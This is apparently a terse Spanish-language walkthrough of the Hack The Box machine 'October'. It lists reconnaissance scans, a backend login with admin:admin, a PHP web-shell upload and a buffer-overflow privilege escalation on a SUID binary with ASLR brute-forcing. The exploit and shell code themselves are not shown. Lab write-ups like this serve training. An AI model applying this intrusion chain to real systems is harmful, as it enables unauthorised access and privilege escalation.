October

October


HTB Windows

nmap -A -p- -oA october 10.129.202.91 --min-rate=10000 --script=vuln --script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA october 10.129.202.91

nmap -sU -O -p- -oA october-udp 10.129.202.91

nikto -h 10.129.202.91:80

ssh_command.

whatweb 10.129.202.91

ssh_command.

ssh_command.

http://10.129.202.91/backend

Credenciales: admin:admin

ssh_command.

Subimos el archivo shell.php.php5 en media

ssh_command.

Le damos clic a «Click here»

ssh_command.

ssh_command.

Vemos ./usr/local/bin/ovrflw

find -perm -4000 2>/dev/null

ssh_command.

ssh_command.

git clone https://github.com/longld/peda

ssh_command.

tar -zcvf peda.tar peda

ssh_command.

python3 -m http.server 8888

wget http://10.10.14.125:8888/peda.tar

ssh_command.

tar -xf peda.tar

ssh_command.

export HOME=/tmp

echo "source ~/peda/peda.py" >> ~/.gdbinit

ssh_command.

pattern_create 500

r ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaAAA’

ssh_command.

pattern_offset 0x41384141

ssh_command.

which ovrflw | xargs ldd

ssh_command.

Creamos un script en Python.

ssh_command.

ssh_command.

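Comprobamos cuántas veces se repite la dirección base de libc en 1000 cargas (con ASLR activo la dirección cambia entre ejecuciones):

for i in $(seq 1000); do ldd /usr/local/bin/ovrflw | grep libc | awk 'NF{print $NF}' | tr -d '()'; done | grep "0xb755a000"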

ssh_command.

ssh_command.

python3 exploit.py

ssh_command.
